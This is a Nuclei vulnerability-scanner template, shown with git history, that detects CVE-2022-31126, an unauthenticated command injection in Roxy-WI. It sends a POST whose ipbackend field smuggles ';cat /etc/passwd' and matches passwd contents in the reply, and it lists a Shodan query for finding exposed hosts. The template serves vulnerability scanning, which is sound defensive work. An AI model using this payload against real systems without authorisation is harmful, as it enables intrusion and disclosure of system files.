nuclei-templates/http/cves/2022/CVE-2022-31126.yaml

53 lines
1.7 KiB
YAML
Raw Normal View History

2022-08-12 16:51:23 +00:00
id: CVE-2022-31126
info:
name: Roxy-WI <6.1.1.0 - Remote Code Execution
2022-08-12 16:51:23 +00:00
author: DhiyaneshDK
severity: critical
description: |
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file.
2022-08-12 16:51:23 +00:00
reference:
- http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html
- https://www.cve.org/CVERecord?id=CVE-2022-31137
- https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9
- https://nvd.nist.gov/vuln/detail/CVE-2022-31137
- https://nvd.nist.gov/vuln/detail/CVE-2022-31126
remediation: Users are advised to upgrade to latest version.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-31126
cwe-id: CWE-74
cpe: cpe:2.3:a:roxy-wi:roxy-wi:*:*:*:*:*:*:*:*
epss-score: 0.85296
2022-08-12 16:51:23 +00:00
metadata:
max-request: 1
2022-08-12 16:51:23 +00:00
shodan-query: http.html:"Roxy-WI"
verified: "true"
tags: cve,cve2022,rce,unauth,roxy,packetstorm
2022-08-12 16:51:23 +00:00
http:
2022-08-12 16:51:23 +00:00
- raw:
- |
POST /app/options.py HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: {{BaseURL}}
Referer: {{BaseURL}}/app/login.py
2022-08-13 00:12:49 +00:00
alert_consumer=1&serv=127.0.0.1&ipbackend=";cat+/etc/passwd+##&backend_server=127.0.0.1
2022-08-12 16:51:23 +00:00
matchers-condition: and
matchers:
2022-08-13 00:12:49 +00:00
- type: regex
2022-08-12 16:51:23 +00:00
part: body
2022-08-13 00:12:49 +00:00
regex:
- "root:.*:0:0:"
2022-08-12 16:51:23 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/10/06